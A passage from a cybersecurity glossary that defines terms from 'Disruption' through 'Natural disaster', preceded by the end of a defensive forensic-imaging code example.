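            "remnant_in_logical_copy": b"deleted_note.txt" in copy_bytes,
        }


if __name__ == "__main__":
    print(demo())
```

On real hardware the source would be the raw block device opened read-only, ideally behind a write blocker, and the acquisition hash would be recorded alongside the examiner's name and time in the chain-of-custody log so that any later copy can be shown to be a duplicate of the original.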
Disruption
A disruption is an unplanned event that causes the general system or major application to be inoperable for an unacceptable length of time (e.g., a minor or extended power outage, an extended network outage, or equipment or facility damage or destruction).
Distributed denial of service ddos
A distributed denial of service is a denial of service technique that uses numerous hosts to perform the attack.
Domain name system dns exfiltration
Domain name system (DNS) exfiltration is a covert technique for moving data out of a network by encoding it in DNS queries, typically as subdomain labels of a domain whose authoritative name server is controlled by the attacker. Because DNS is rarely blocked at the network boundary and its traffic is seldom inspected, the technique is difficult to detect; the data lost can range from simple to complex in nature and importance.
Domain name system
A domain name system is a distributed, hierarchical system that converts human-readable domain names into the numerical IP addresses that Internet hosts use. Because remembering the numerical addresses of many hosts is impractical, users type domain names, and each time they do, DNS resolves the name into an IP address. DNS answers are not authenticated unless DNSSEC is in use, which makes DNS a common target for spoofing and cache poisoning.
Dual use certificate
A dual-use certificate is a certificate that is intended for use with both digital signature and data encryption services.
Due care
Due care is the degree of care a rational person would exercise in situations similar to the one at hand. Also known as ordinary care or reasonable care, it is a test of a person's preparedness to act responsibly or of their neglect of responsibility.
Due diligence
Due diligence is the process of conducting a thorough and detailed investigation to verify the truthfulness of the information provided in statements for analysis and review before committing to a transaction. It is a measure of prudence that a rational person would undertake before taking a final decision.
Duplicate digital evidence
Duplicate digital evidence is a duplicate that is an accurate digital reproduction of all data objects contained on the original physical item and associated media.
Dynamic ports
Dynamic ports, otherwise known as private ports, are the ports ranging from port number 49,152 to 65,535. They do not need any registration, and they help any computer application communicate with any other application or program that uses the transmission control protocol (TCP) or the user datagram protocol (UDP).
E commerce
The process of conducting any kind of business or commercial transaction electronically with the help of the internet is termed e-commerce. The internet enables sellers to accept orders and payments online. As the most popular mode of business today, e-commerce is widely used for completing business-to-business, business-to-consumer, consumer-to-consumer, and consumer-to-business transactions.
E government
E-government is the U.S. government's use of web-based internet applications and other information technology.
Easter egg
An easter egg is hidden functionality within an application program that becomes activated when an undocumented set of commands or keystrokes is entered. Easter eggs are typically used to display the credits for the development team and are intended to be non-threatening.
Egress filtering
Egress filtering is the filtering of outgoing network traffic.
Electronic key entry
Electronic key entry is the entry of cryptographic keys into a cryptographic module using electronic methods such as a smart card or a key-loading device.
Electronic key management system
An electronic key management system is an interoperable collection of systems being developed by services and agencies of the U.S. government to automate the planning, ordering, generating, distributing, storing, filling, using, and destroying of electronic key and the management of other types of COMSEC material.
Electronic signature
An electronic signature is the process of applying any mark in electronic form with the intent to sign a data object and is used interchangeably with digital signature.
Electronically generated key
An electronically generated key is a key generated in a COMSEC device by mechanically or electronically introducing a seed key into the device and then using the seed in conjunction with a software algorithm stored in the device to produce the desired key.
Elliptic curve cryptography ECC
Elliptic curve cryptography is a technique that uses an elliptic curve equation to create cryptographic keys; keys generated this way are much smaller, and faster and more efficient to use. This modern technique keeps the decryption key private while the encryption key is public. Unlike traditional methods of generating cryptographic keys such as RSA, the elliptic curve technique relies on discrete logarithms, making it difficult to decipher or challenge the keys.
Embedded cryptographic system
An embedded cryptosystem is a system performing or controlling a function as an integral element of a larger system or subsystem.
Embedded cryptography
Embedded cryptography is cryptography engineered into equipment or a system whose basic function is not cryptographic.
Encapsulating security payload
An encapsulating security payload is an IPsec protocol that offers a combination of authentication, confidentiality, and integrity for IPv4 and IPv6 network packets. Encapsulating security payload offers data integrity and protection services by encrypting data, providing anti-replay protection, and preserving the data within its assigned IP packet.
Encipher
To encipher is to convert plaintext to ciphertext via a cryptographic system.
Encryption algorithm
An encryption algorithm is a set of mathematically expressed rules for rendering data unintelligible by executing a series of conversions controlled by a key.
Encryption certificate
An encryption certificate is a certificate containing a public key that is used to encrypt electronic messages, files, documents, or data transmissions, or to establish or exchange a session key for these same purposes.
Encryption key
An encryption key is a code of variable value developed with the help of an encryption algorithm to encrypt and decrypt information.
Encryption
Encryption is a process of maintaining data integrity and confidentiality by converting plain data into a secret code with the help of an algorithm. Only authorized users with a key can access the encrypted data, or ciphertext.
End cryptographic unit
An end cryptographic unit is a device that (1) performs cryptographic functions, (2) typically is part of a larger system for which the device provides security services, and (3) from the viewpoint of a supporting security infrastructure (e.g., a key management system), is the lowest level of identifiable component with which a management transaction can be conducted.
End-to-end encryption
End-to-end encryption describes communications encryption in which data is encrypted when passing through a network with the routing information still visible.
Enterprise architecture
The enterprise architecture is the description of an enterprise’s entire set of information systems: configuration, integration and how they interface. Enterprise architecture also describes how they are operated to support the enterprise mission, and how they contribute to the enterprise’s overall security posture.
Enterprise risk management
Enterprise risk management is the methods and processes used by an enterprise to manage risks to its mission and to establish the trust necessary for the enterprise to support shared missions. It involves the identification of mission dependencies on enterprise capabilities, the identification and prioritization of risks due to defined threats, the implementation of countermeasures to provide both a static risk posture and an effective dynamic response to active threats; and it assesses enterprise performance against threats and adjusts countermeasures as necessary.
Enterprise
An enterprise is an organization with a defined mission/goal and a defined boundary, using information systems to execute that mission, and with responsibility for managing its own risks and performance. An enterprise may consist of all or some of the following business aspects: acquisition, program management, financial management (e.g., budgets), human resources, security, and information systems, information and mission management.
Entrapment
Entrapment is the deliberate planting of apparent flaws in an information system with the intent to detect attempted penetrations.
Eradication
Eradication is an important function of the incident management process that follows the containment of an incident. Once the incident has been identified and controlled in the containment stage, eradication identifies and removes the root cause of the incident completely from the system and avoids any chance of the incident recurring.
Ethernet
Ethernet is the most popular local area network (LAN) technology; it specifies cabling and signalling systems for home networks and for organizations. Ethernet uses a bus topology to support data transfers and carrier sense multiple access with collision detection (CSMA/CD) to process requests at the same time.
Event
An event is an action or an occurrence that a program can detect. Examples of events are clicking a mouse button or pressing a key.
Evidence
Evidence is documents, records, or any other objects or information that help prove the facts in a case.
Exercise key
An exercise key is cryptographic key material used exclusively to safeguard communications transmitted over-the-air during military or organized civil training exercises.
Exploit code
Exploit code is a program that allows attackers to automatically break into a system.
Exploit
An exploit is the act of taking advantage of a weakness or flaw in a system to intrude into or attack it.
Exploitable channel
An exploitable channel is a channel that allows the violation of the security policy governing an information system and is usable or detectable by subjects external to the trusted computing base.
External network
An external network is a network not controlled by the organization.
External security testing
External security testing is security testing conducted from outside the organization’s security perimeter.
Fail safe
A fail safe is the automatic protection of programs and/or processing systems when hardware or software failure is detected.
Fail soft
Fail soft is the elective termination of affected nonessential processing when hardware or software failure is determined to be imminent.
Failover
Failover is a system's capability to switch over automatically, without any warning or human intervention, to a redundant or standby information system upon the failure or abnormal termination of the previously active system.
False positive
A false positive is an alert that incorrectly indicates that malicious activity is occurring.
Federal information system
The federal information system is an information system used or operated by an executive agency, a contractor of an executive agency, or by another organization on behalf of an executive agency.
Federal public key infrastructure policy authority FPKI PA
The federal PKI policy authority is a federal government body responsible for setting, implementing, and administering policy decisions regarding interagency PKI interoperability that uses the FBCA.
File encryption
File encryption is the process of encrypting individual files on a storage medium and permitting access to the encrypted data only after proper authentication is provided.
Filename anomaly
A file name anomaly is a mismatch between the internal file header and its external extension. A file name anomaly is also a file name inconsistent with the content of the file (e.g., a graphics file renamed with a non-graphical extension).
File protection
File protection is the aggregate of processes and procedures designed to inhibit unauthorized access, contamination, elimination, modification, or destruction of a file or any of its contents.
File security
File security is the method in which access to computer files is limited to authorized users only.
File transfer protocol FTP
File transfer protocol (FTP) is an internet protocol for transferring files from one computer to another in a network using TCP/IP.
Fill device
A fill device is a COMSEC item used to transfer or store keys in electronic form or to insert key into cryptographic equipment.
Firewall control proxy
A firewall control proxy is the component that controls a firewall’s handling of a call. The firewall control proxy can instruct the firewall to open specific ports that are needed by a call, and direct the firewall to close these ports at call termination.
Firewall
A firewall is a security system tool that includes any software or hardware aimed at preventing viruses, worms, and hackers from intruding into a system or network.
Firmware
Firmware consists of the programs and data components of a cryptographic module that are stored in hardware within the cryptographic boundary and cannot be dynamically written or modified during execution.
Flaw hypothesis methodology
Flaw hypothesis methodology is the system analysis and penetration technique in which the specification and documentation for an information system are analyzed to produce a list of hypothetical flaws. This list is prioritized on the basis of the estimated probability that a flaw exists, on the ease of exploiting it, and on the extent of control or compromise it would provide. The prioritized list is used to perform penetration testing of a system.
Flooding
Flooding is an attack that attempts to cause a failure in a system by providing more input than the system can process properly.
Focused testing
Focused testing is a test methodology that assumes some knowledge of the internal structure and implementation detail of the assessment object. Focused testing is also known as gray box testing.
Forensic copy
A forensic copy is an accurate bit-for-bit reproduction of the information contained on an electronic device or associated media, whose validity and integrity have been verified using an accepted algorithm.
Forensic examination
Forensic examination is the investigation to evaluate, analyze, organize, preserve, and document evidence, including digital evidence that helps identify the cause of an incident.
Forensic specialist
A forensic specialist is a professional who locates, identifies, collects, analyzes, and examines data while preserving the integrity and maintaining a strict chain of custody of information discovered.
Forensically clean
Forensically clean describes digital media that is completely wiped of all data, including nonessential and residual data, scanned for malware, and verified before use.
Forensics
Forensics is the practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data.
Forward cipher
A forward cipher is one of the two functions of a block cipher algorithm that is determined by the choice of a cryptographic key. The term "forward cipher operation" is used for TDEA, while the term "forward transformation" is used for DEA.
Freeware
Freeware is an application, program, or software available for use at no cost.
Full disk encryption FDE
Full disk encryption is the process of encrypting all the data on the hard disk drive used to boot a computer, including the computer’s operating system, and permitting access to the data only after successful authentication with the full disk encryption product.
Gateway
Gateways are network points that act as an entrance to another network. A node or stopping point can be either a gateway node or a host (end-point) node.
Get nearest server
Get nearest server is a request packet sent by a client on an IPX network to locate the nearest active server of a particular type. An IPX network client issues a GNS request to solicit either a direct response from a connected server or a response from a router that tells it where on the internetwork the service can be located. GNS is part of the IPX SAP.
Gethostbyaddr
gethostbyaddr is a DNS (domain name system) query that returns the internet host name corresponding to an IP address.
Global information grid GIG
The global information grid is the globally interconnected, end-to-end set of information capabilities for collecting, processing, storing, disseminating, and managing information on demand to warfighters, policy makers, and support personnel. The GIG includes owned and leased communications and computing systems and services, software (including applications), data, security services, other associated services, and national security systems. Non-GIG includes stand-alone, self-contained, or embedded IT that is not, and will not be, connected to the enterprise network.
Global information infrastructure GII
The global information infrastructure is the worldwide interconnections of the information systems of all countries, international and multinational organizations, and international commercial communications.
GNU
The name GNU stands for "GNU's Not Unix" (GNU is pronounced g'noo). The development of GNU started in January 1984 and is known as the GNU project. GNU is a Unix-like operating system (OS) that comprises many programs such as applications, libraries, developer tools, and games. GNU is available with source code, which allows a user to run, copy, modify, distribute, study, change, and improve the software.
Gnutella
Gnutella is an open file sharing or peer-to-peer (P2P) network that was originally developed by Justin Frankel and Tom Pepper of Nullsoft in early 2000. It was the first decentralised file sharing network in which each node acts as a server for sharing files while simultaneously acting as a client that searches for and downloads files from other users.
Governance risk management and compliance
Governance, risk management and compliance is a comprehensive and integrated organization-wide system for achieving the goals set in each area, namely governance, risk management, and compliance, and for meeting regulatory standards and requirements.
Governance
Governance is a system for directing and controlling an organization. It includes a set of rules, processes, and practices established to evaluate the options, needs, and conditions of stakeholders such as management, suppliers, financiers, and customers. It also includes a framework for attaining the established goals of an organization while achieving a balance between the goals of the organization and the interests of the stakeholders. It aims to protect the interests of the organization by protecting its assets, and the interests of its creditors and customers.
Graduated security
Graduated security is a security system that provides several levels (e.g., low, moderate, high) of protection based on threats, risks, available technology, support services, time, human concerns, and economics.
Group authenticator
A group authenticator is used sometimes in addition to a sign-on authenticator, to allow access to specific data or functions that may be shared by all members of a particular group.
Guard system
A guard system is a mechanism limiting the exchange of information between information systems or subsystems.
Guessing entropy
Guessing entropy is a measure of the difficulty an attacker has in guessing the average password used in a system. Entropy is stated in bits. When a password has n bits of guessing entropy, an attacker has as much difficulty guessing the average password as in guessing an n-bit random quantity. The attacker is assumed to know the actual password frequency distribution.
Guideline
A guideline is a general rule or piece of advice that must be followed in order to accomplish the set goals of an organization.
Hacker
A hacker is a term used for an expert computer programmer who intentionally tries to gain unauthorized access to a network or computer system.
Handshaking procedures
Handshaking procedures are the dialogue between two information systems for synchronizing, identifying, and authenticating themselves to one another.
Hard copy key
A hard copy key is physical keying material, such as printed key lists, punched or printed key tapes, or programmable, read-only memories.
Hardening
Hardening, also known as system hardening, refers to providing protection to a computer system at various layers, such as the host, application, OS, user, and physical levels, and all the other sublevels in between. A hardened computer system is a more secure computer system. Hardening eliminates as many risks and threats to a computer system as necessary.
Hardware
Hardware is the physical component of an information system. See also software and firmware.
Hardwired key
A hardwired key is a permanently installed key.
Hash based message authentication code HMAC
Hash-based message authentication code is a message authentication code that uses a cryptographic key in conjunction with a hash function.
Hash function
A hash function is a function that is used to map data of arbitrary size to data of a known or fixed size. The values returned by a hash function are called hash values, hash codes, hash sums, or simply hashes.
Hash functions
A cryptographic hash function is a kind of hash function for which it is practically impossible to recreate the input data from its hash value alone. The input data is referred to as the 'message', and the hash value is called the 'message digest' or the 'digest'. The result of this hash function can be used to check whether a larger file has been changed without comparing the larger files themselves. Examples of frequently used hash functions are MD5 and SHA-1.
Hash total
A hash total is a method of verifying the accuracy of data; it involves adding up the data in different fields, including fields that have no arithmetic significance, such as account numbers. The sum thus arrived at should be the same as the original; a mismatch in the totals indicates an error.
Hash value
A hash value is the result of applying a cryptographic hash function to data (e.g., a message).
Hashing
Hashing is a system of generating string values with the help of algorithms to maintain data integrity and accuracy.
Header
A header refers to the additional data at the beginning of a chunk of data (or packet) being stored or transmitted. The data that follows the header is called the payload or body. Note that it is important that the header is of a clear and unambiguous format to allow for parsing.
High assurance guard HAG
A high assurance guard is an enclave boundary protection device that controls access, with a high degree of assurance, between a local area network that an enterprise system has a requirement to protect and an external network that is outside the control of the enterprise system. It is a guard that has two basic functional capabilities: a message guard and a directory guard. The message guard provides a filter service for message traffic traversing the guard between adjacent security domains. The directory guard provides a filter service for directory access and updates traversing the guard between adjacent security domains.
High availability
High availability is a failover feature to ensure availability during device or component interruptions.
High impact system
A high impact system is an information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a FIPS 199 potential impact value of high.
High impact
High impact is the loss of confidentiality, integrity, or availability that could be expected to have a severe or catastrophic adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; i.e., it (1) causes a severe degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; (2) results in major damage to organizational assets; (3) results in major financial loss; or (4) results in severe or catastrophic harm to individuals involving loss of life or serious life-threatening injuries.
Hijack attack
A hijack attack is a form of active wiretapping in which the attacker seizes control of a previously established communication association.
Hijacking
Hijacking is a network security attack by which the intruder takes control of a connection while a session is in progress. The intruder gains unauthorized access to the information.
Honeyclient
Honeyclient is a web browser-based high interaction client honeypot designed by Kathy Wang in 2004 and subsequently developed at MITRE. It was the first open source client honeypot and is a mix of Perl, C++, and Ruby. Honeyclient is state-based and detects attacks on Windows clients by monitoring files, process events, and registry entries.
Honeymonkey
A honeymonkey is an automated program that imitates a human user to detect and identify websites which exploit vulnerabilities on the internet. It is also known as a honey client.
Honeypot
A honeypot is a computer security program that simulates one or more network services that you define on your computer's ports. An attacker may assume that you're running weak services that can be used to break into the machine. A honeypot provides you advance warning of a more concerted attack. Two or more honeypots on a network form a honeynet.
Hop
A hop occurs each time a data packet is passed from one device (source) to the next device (destination). Data packets pass through bridges, routers, and gateways on the way.
Host based intrusion detection system HIDS
A host-based intrusion detection system (HIDS) is an intrusion detection system that monitors and analyzes information from the operating system audit records generated on the host. These operations are then compared to a predefined security policy norm. This analysis of the audit trail imposes significant overhead on the system because of the increased processing power the intrusion detection system must use. Depending on the size of the audit trail and the processing ability of the system, the review of audit data could result in the loss of a real-time analysis capability.
Host
A network host is a computer or other device connected to a computer network. A network host is a network node that is assigned a network layer host address. A network host may offer information resources, services, and applications to users or other nodes on the network.
Hot site
A hot site is a fully operational offsite data processing facility, equipped with hardware and software, to be used in the event of an information system disruption. It is a backup site that includes phone systems with the phone lines already connected. Networks will also be in place, with any necessary routers and switches plugged in and turned on. Desks will have desktop PCs installed and waiting, and server areas will be replete with the necessary hardware to support business-critical functions. Within a few hours, a hot site can become a fully functioning element of an organization.
Hot wash
A hot wash is a debrief conducted immediately after an exercise or test with the staff and participants.
HTTP proxy
An HTTP proxy is a server that receives requests from your web browser and then forwards them to the internet on your behalf. It then returns the results to your browser.
HTTPS
HTTPS (also called HTTP over TLS, HTTP over SSL, and HTTP secure) is an internet protocol used for secure communication over a computer network. HTTPS is very important over insecure networks (such as public wifi), as anyone on the same local network can discover sensitive information not protected by HTTPS. HTTPS consists of communication over hypertext transfer protocol (HTTP) within a connection encrypted by transport layer security or its predecessor, secure sockets layer.
Hub
A hub is a network device that is a common connection point for devices in a network. Hubs are commonly used to connect segments of a LAN. A hub contains multiple ports. When a data packet is received at one port, it is transmitted to the other ports on the hub.
Hybrid attack
A hybrid attack is a blend of a dictionary attack and a brute-force attack. This means that while the dictionary attack supplies a wordlist of passwords, brute-force variations are applied to each possible password in that list.
Hybrid encryption
Hybrid encryption is a method of encryption that combines two or more encryption algorithms or systems. This method merges asymmetric and symmetric encryption in order to derive benefit from the strengths of each form of encryption. These strengths include speed and security respectively.
Hybrid security control
Hybrid security control is a security control that is implemented in an information system in part as a common control and in part as a system-specific control.
Hyperlink
A hyperlink (usually highlighted by color or underscoring) could be a word, a phrase, or an image that refers to data or related information that the user can directly follow either by clicking or by hovering. A hyperlink points to a whole document or to a specific element within a document, while hypertext is text with hyperlinks.
Hypertext markup language HTML
Hypertext markup language (HTML) is a set of markup symbols or codes that are inserted in a file intended for display on a world wide web (WWW) browser page. This markup tells the browser how to display a web page to the user.
Hypertext transfer protocol HTTP
HTTP is the underlying protocol used by the world wide web (WWW). This protocol defines how messages are formatted and transmitted on the internet and what actions web servers and browsers should take in response to various commands.
Internet identity IID
Internet identity (IID), or internet persona, is a social identity that an internet user creates on online communities and websites. While some users prefer using their real names online, others prefer to be anonymous and identify themselves by means of pseudonyms.
Incident handling
Incident handling is an action plan developed (by an organisation or individual) to counteract intrusions, cyber-theft, denial of service, fire, flood, and any other security-related events. It comprises six process steps: preparation, identification of attack, containment of attack, eradication, recovery, and analysis (lessons learned documentation).
Incident
An incident is an unplanned disruption or degradation of a network or system service that needs to be resolved immediately. An example of an incident is a server crash that causes a disruption in the business process. However, if the disruption is planned, say, a scheduled maintenance, it is not an incident.
Incremental backups
An incremental backup provides a backup of only those files that have changed, modified, or are new since the last backup. Incremental backups are often desirable as they consume minimum storage and are quicker to perform than differential backups.
Inetd
Inetd stands for internet service daemon and is a super-server daemon on many Unix systems that manages several internet services. This reduces the load on the system, since network services such as Telnet, file transfer protocol (FTP), and simple mail transfer protocol (SMTP) can be activated on demand rather than running continuously.
Inference attack
An inference attack is a data mining technique used to illegally access information about a subject or database by analyzing data. This is an example of breached information security. Such an attack occurs when a user is able to deduce key or critical information of a database from trivial information without directly accessing it.
Information warfare
Information warfare (iw) is primarily a United States military concept that involves the use and management of information and communication technology in pursuit of a competitive advantage over an opponent. This concept may employ a combination of tactical information, assurance(s) that the information is valid, spreading of propaganda or disinformation to demoralise or manipulate the enemy and the public, undermining the quality of opposing force information and denial of information-collection opportunities to opposing forces.
Ingress filtering
Ingress filtering is used to ensure that all incoming packets (of data) are from the networks from which they claim to originate. Network ingress filtering is a packet filtering technique commonly used by many internet service providers to prevent source address spoofing. This helps in combating net abuse and crimes by making internet traffic traceable to its source.
Input validation attacks
Input validation attacks are attacks in which an attacker purposefully sends strange inputs to confuse a web application. Input validation routines serve as the first line of defence against such attacks. Examples of input validation attacks include buffer overflow, directory traversal, cross-site scripting, and SQL injection.
Integrity star property
Integrity star property means a user cannot access or read data of a lower integrity level than their own.
Integrity
Integrity of a system or network is the assurance that information can only be accessed or modified by those who are authorised. Several measures are taken to ensure integrity. These include controlling the physical environment of networked terminals and servers, restricting access to data, and maintaining rigorous authentication practices. Data integrity can also be threatened by environmental hazards, such as heat, dust, and electrical surges.
Internet control message protocol ICMP
The Internet Control Message Protocol (ICMP) is one of the key Internet protocols. Network devices such as routers use it to send error messages to the source IP address when network problems prevent delivery of IP packets. Any IP network device has the capability to send, receive or process ICMP messages. The protocol is also used to relay query messages and is assigned IP protocol number 1.
Internet engineering task force IETF
The Internet Engineering Task Force (IETF) is a large, open, international community of network designers, operators, vendors and researchers concerned with the evolution of the Internet architecture and its smooth operation. This body defines the standard Internet operating protocols such as TCP/IP. The IETF is overseen by the Internet Architecture Board (IAB) under the Internet Society. The Internet Assigned Numbers Authority (IANA) is the central coordinator for the assignment of unique parameter values for Internet protocols.
Internet message access protocol IMAP
The Internet Message Access Protocol (IMAP) is a standard Internet protocol used by email clients to retrieve email messages from a mail server over TCP/IP. IMAP is defined by RFC 3501. An IMAP server typically listens on port 143. IMAP over SSL/TLS (IMAPS) is assigned port 993.
Internet protocol IP
The Internet Protocol (IP) is a communication protocol used for relaying datagrams across network boundaries. Its routing function enables internetworking and essentially establishes the Internet.
Internet protocol security IPsec
Internet Protocol Security (IPsec) is a protocol suite for securing Internet Protocol (IP) communications by authenticating and encrypting each IP packet of a communication session. IPsec can be used to protect data flows between a pair of hosts (host-to-host), between security gateways (network-to-network), or between a security gateway and a host (network-to-host).
Internet protocol address IP address
An Internet Protocol address (IP address) is a numerical label assigned to each device connected to a network that uses the Internet Protocol for communication. An IP address serves two basic functions: host or network interface identification, and location addressing.
Internet standard
An Internet standard (STD) is a normative specification of a technology or methodology applicable to the Internet, approved by the IESG and published as an RFC. Internet standards are created and published by the Internet Engineering Task Force (IETF). An Internet standard is characterised by technical reliability and usefulness. The IETF also defines a proposed standard as a less mature but stable and well-reviewed specification.
Internet
The Internet is the worldwide network of interconnected computers that use the Internet protocol suite (TCP/IP) to link billions of devices across the globe. It carries an extensive range of information resources and services, such as the inter-linked hypertext documents and applications of the World Wide Web (WWW), electronic mail, telephony, and peer-to-peer networks for file sharing.
Interrupt
An interrupt is a signal sent to the processor by hardware or software indicating an event that needs immediate attention.
Intranet
An intranet is a private or internal network accessible only to an organisation’s personnel. An intranet is built with the technologies used for local area networks (LANs) and wide area networks (WANs).
Intrusion detection ID
Intrusion detection (ID) is a security management system for computers and networks. An ID system gathers and analyses information from a computer or a network to identify possible security breaches, which include both intrusions and misuse. Such a system uses vulnerability assessment, a technology developed to assess the security of a computer system or network.
IP flood
An IP flood is a type of denial of service attack in which the victim system is flooded with traffic that uses up all the available bandwidth and prevents legitimate users from gaining access. When IP flood detection is enabled, a router is able to block malicious devices that are attempting to flood other devices.
IP forwarding
IP forwarding is also known as Internet routing. It is the process used to determine the path along which a packet or datagram is sent. IP forwarding is an OS option that allows a host to act as a router. A system with more than one network interface card must have IP forwarding turned on in order to act as a router.
IP spoofing
IP spoofing is also known as IP address forgery or a host file hijack. It is a hijacking technique in which an attacker impersonates a trusted host to conceal their identity, spoof a website, hijack browsers, or gain access to a network.
International organization for standardization ISO
The International Organization for Standardization (ISO) is an international standard-setting body composed of voluntary representatives from various national standards organizations.
Issue specific policy
An issue-specific policy is intended to address specific needs within an organisation, such as a password policy.
ITU-T
The ITU Telecommunication Standardization Sector (ITU-T) is one of the three sectors of the International Telecommunication Union (ITU). It coordinates standards for telecommunications. The International Telegraph and Telephone Consultative Committee (CCITT, from the French Comité consultatif international téléphonique et télégraphique) was created in 1956 and renamed ITU-T in 1993. The ITU became a United Nations specialized agency in 1947.
Jitter
Jitter is any deviation in, or displacement of, the signal pulses in a high-frequency digital signal. The aberration can be in amplitude, phase timing, or the width of the signal pulse. Jitter is sometimes referred to as “packet delay variation,” or PDV. Controlling jitter is critical for a good online experience.
Jump bag
A jump bag is a container holding all the items necessary to respond to an incident, kept ready to help mitigate the effects of a delayed reaction.
Kerberos
Kerberos is a ticket-based computer network authentication protocol that allows nodes to communicate securely over a non-secure network. The Massachusetts Institute of Technology (MIT) developed Kerberos to protect the network services provided by Project Athena. The protocol is based on the earlier Needham–Schroeder symmetric key protocol. Kerberos protocol messages are protected against snooping and replay attacks.
Kernel
The kernel is the essential centre of a computer operating system, the core that provides basic services for all other parts of the operating system. A synonym is nucleus. A kernel can be contrasted with a shell, the outermost part of an operating system that interacts with user commands. Kernel and shell are terms used more frequently in Unix operating systems than in IBM mainframe or Microsoft Windows systems.
Lattice techniques
Lattice techniques use security designations to determine access to information.
Layer 2 forwarding protocol L2F
Layer 2 Forwarding protocol (L2F) is an Internet protocol, originally developed by Cisco, that tunnels PPP over IP to create a virtual extension of a dial-up link across a network. The tunnel is initiated by the dial-up server and is transparent to the dial-up user.
Layer 2 tunneling protocol L2TP
Layer 2 Tunneling Protocol (L2TP) is an extension of the Point-to-Point Tunneling Protocol used by an Internet service provider to enable the operation of a virtual private network over the Internet.
Least privilege
Least privilege is the principle of granting users or applications the least amount of permission necessary to perform their intended function.
Legion
Legion is a software tool used to detect unprotected shares.
Lightweight directory access protocol LDAP
The Lightweight Directory Access Protocol (LDAP) is an open, vendor-neutral, industry standard application protocol used for accessing and maintaining distributed directory information services over an IP network.
Link state
Link-state routing protocols are one of the two main classes of routing protocols used in packet switching networks. The link-state protocol is performed by every switching node in the network. Every node creates a map of its connectivity to the network (in the form of a graph) showing which nodes are connected to which other nodes. Each node then calculates the next best logical path from itself to every possible destination in the network. The collection of these best paths forms the node’s routing table.
List based access control
List-based access control associates a list of users and their privileges with each object, such as a file directory or an individual file. Each object has a security attribute that identifies its access control list. The list has an entry for each system user with access privileges. This list is implemented differently by each operating system.
Loadable kernel modules LKM
A loadable kernel module (LKM) is an object file that contains code to extend the running kernel, or base kernel, of an operating system. LKMs are usually used to add support for new hardware and/or file systems, and even to add system calls.
Log clipping
Log clipping is the selective removal of log entries from a system log to hide a compromise.
Logic bombs
A logic bomb is a piece of code deliberately inserted into a system to trigger a malicious program. Viruses and worms often contain logic bombs that execute a certain payload at a pre-defined time or when some other condition is met. Some viruses attack their host systems on specific dates, such as Friday the 13th or April Fools’ Day. Trojans that activate on certain dates are often called time bombs.
Logic gate
A logic gate is an elementary building block of a digital circuit. The device implements a Boolean function: it performs a logical operation on one or more logical inputs and produces a single logical output.
Loopback address
A loopback address is a pseudo address that sends outgoing signals back to the same computer for testing. In a TCP/IP network, pinging the loopback IP address always returns a reply unless the firewall prevents it.
MAC address
A media access control address (MAC address), also known as the physical address, is a unique identifier assigned to a network interface for communication. MAC addresses are generally used as network addresses for most IEEE 802 network technologies (including Ethernet and Wi-Fi). They are used in the media access control protocol sub-layer of the OSI reference model.
Malicious code
Malicious code is any code in any part of a software system or script that is intended to cause undesired effects, security breaches, or damage to a system. Such code gains unauthorised access to system resources or tricks a user into executing other malicious logic. Malicious code describes a broad category of system security terms that includes attack scripts, viruses, worms, Trojan horses, backdoors, and malicious active content.
Malware
Malware is short for malicious software. Malware is defined as any software used to interrupt or disrupt computer operations, gather sensitive information, or gain access to certain files or programs.
Mandatory access control MAC
Mandatory access control (MAC) is a security approach that constrains the ability of an individual resource owner to grant or deny access to resources or files on the system. Whenever a user tries to access an object, an authorisation rule is enforced by the OS: the kernel examines the relevant security attributes and decides whether the access is permitted. Any operation by any user is typically tested against a set of authorisation rules (also called a policy) to determine if the operation is allowed.
Masquerade attack
A masquerade attack is any attack that uses a forged identity (such as a network identity) to gain unauthorised access to a personal or organisational computer. Masquerade attacks are generally performed using stolen passwords and logins, by locating gaps in programs, or by finding a way around the authentication process. Such attacks are launched either by someone within the organisation or by an outsider if the organisation is connected to a public network.
MD5
MD5 was designed by Professor Ronald L. Rivest of MIT in 1991. The MD5 message-digest algorithm is the most widely used cryptographic hash function producing a 128-bit (16-byte) hash value, typically expressed in text format as a 32-digit hexadecimal number. It was developed for use with digital signature applications that require large files to be compressed by a secure method before being encrypted with a secret key under a public key cryptosystem. MD5 is specified in Internet Engineering Task Force (IETF) Request for Comments (RFC) 1321.
Measures of effectiveness MOE
Measures of effectiveness (MOE) form a probability model, based on engineering concepts, that allows one to estimate the impact of a given action on an environment. MOE quantify the results to be obtained by a system and may be expressed as probabilities that the system will perform as required.
Monoculture
Monoculture is the case where a large number of users run the same software and are therefore vulnerable to the same attacks.
Morris worm
The Morris worm (or Internet worm) program was written by a graduate student at Cornell University, Robert Tappan Morris, and launched on November 2, 1988 from MIT. It was the first computer worm distributed via the Internet and gained significant mainstream media attention.
Multicast
An IP multicast is a method of sending packets of data to a group of receivers in a single transmission. This method is often used to stream media applications on the Internet and private networks.
Multi homed
A multi-homed host is any computer host that has multiple IP addresses on connected networks. A multi-homed host is physically connected to multiple data links that can be on the same or different networks. Multihoming is commonly used in web management for load balancing, redundancy, and disaster recovery.
Multiplexing
Multiplexing is a technique by which multiple analog or digital data streams are combined into one signal over a shared medium. Multiplexing originated in telegraphy in the 1870s and is now widely applied in communications. The multiplexed signal is transmitted over a communication channel, such as a cable. A reverse process, known as demultiplexing, extracts the original channels at the receiver end.
Network address translation NAT
Network address translation (NAT) is an approach used to remap one IP address space into another by modifying network address information in IP datagram packet headers while they are in transit. The technique was originally used for rerouting traffic in IP networks without renumbering every host. Typically, home or small business networks use NAT to share a single DSL or cable modem IP address. In some cases NAT is also used in front of servers as an additional layer of protection.
National institute of standards and technology NIST
The National Institute of Standards and Technology (NIST) is a non-regulatory federal agency within the U.S. Department of Commerce. NIST’s mission is to promote U.S. innovation and industrial competitiveness by advancing measurement science, standards, and technology in ways that enhance economic security and improve our quality of life.
Natural disaster
A natural disaster is any act of God or natural event caused by environmental factors. Examples include fire, flood, earthquake, lightning, or wind that disables a system, part of it, or a network of systems.
Netmask
